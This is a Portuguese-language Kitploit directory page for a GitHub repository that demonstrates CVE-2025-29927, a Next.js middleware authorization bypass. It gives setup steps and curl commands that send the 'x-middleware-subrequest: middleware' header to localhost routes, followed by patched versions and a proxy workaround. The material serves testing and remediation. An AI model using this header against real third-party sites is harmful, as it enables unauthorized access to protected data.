Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
claude-create-CVE-2025-29927 — Testa e demonstra CVE-2025-29927, uma bypass de autorização de middleware no Next.js. Inclui scripts de teste de exploração e acesso normal, além de orientação de remediação. | Kitploit
Ferramentas/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebAprendizado e Educação
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

Testa e demonstra CVE-2025-29927, uma bypass de autorização de middleware no Next.js. Inclui scripts de teste de exploração e acesso normal, além de orientação de remediação.

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Testador de Vulnerabilidade de Middleware do Next.js (CVE-2025-29927)

Esta aplicação demonstra a vulnerabilidade de bypass de autorização no middleware do Next.js (CVE-2025-29927).

Sobre a Vulnerabilidade

CVE-2025-29927 é uma vulnerabilidade de bypass de autorização no middleware do Next.js. Ao enviar um cabeçalho HTTP especialmente criado (x-middleware-subrequest), um atacante pode contornar as verificações de autorização implementadas no middleware, potencialmente obtendo acesso a recursos protegidos.

Instruções de Configuração

  1. Instale as dependências:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. Execute o servidor de desenvolvimento:

    root@kitploit:~
    npm run dev
    
  3. O servidor iniciará em http://localhost:3000

Testando a Vulnerabilidade

Acesso Normal (Deve ser Bloqueado)

Tente acessar a rota protegida normalmente:

root@kitploit:~
npm run test-normal

ou

root@kitploit:~
curl -v http://localhost:3000/protected-data

Você deve receber uma resposta 401 Não Autorizado, já que o middleware bloqueia o acesso.

Explorando a Vulnerabilidade

Tente acessar a rota protegida com o cabeçalho de exploração:

root@kitploit:~
npm run test-exploit

ou

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

Se a aplicação for vulnerável, você receberá uma resposta 200 OK com os dados protegidos.

Testando a Rota da API

Acesso normal (deve ser bloqueado):

root@kitploit:~
curl -v http://localhost:3000/api/protected

Com exploração:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Correção

Para corrigir esta vulnerabilidade, você deve:

  1. Atualize o Next.js para uma versão corrigida:

    • Next.js 15.x: Atualize para 15.2.3 ou posterior
    • Next.js 14.x: Atualize para 14.2.25 ou posterior
    • Next.js 13.x: Atualize para 13.5.9 ou posterior
    • Next.js 12.x: Atualize para 12.3.5 ou posterior
  2. Se não puder atualizar, implemente um proxy reverso (como Nginx ou Cloudflare) que remova o cabeçalho x-middleware-subrequest das requisições recebidas.

Comandos de Teste Adicionais

Teste se a rota da API é vulnerável:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança. Use-a para verificar se suas próprias aplicações Next.js estão vulneráveis e precisam de correção.

Baixar ferramenta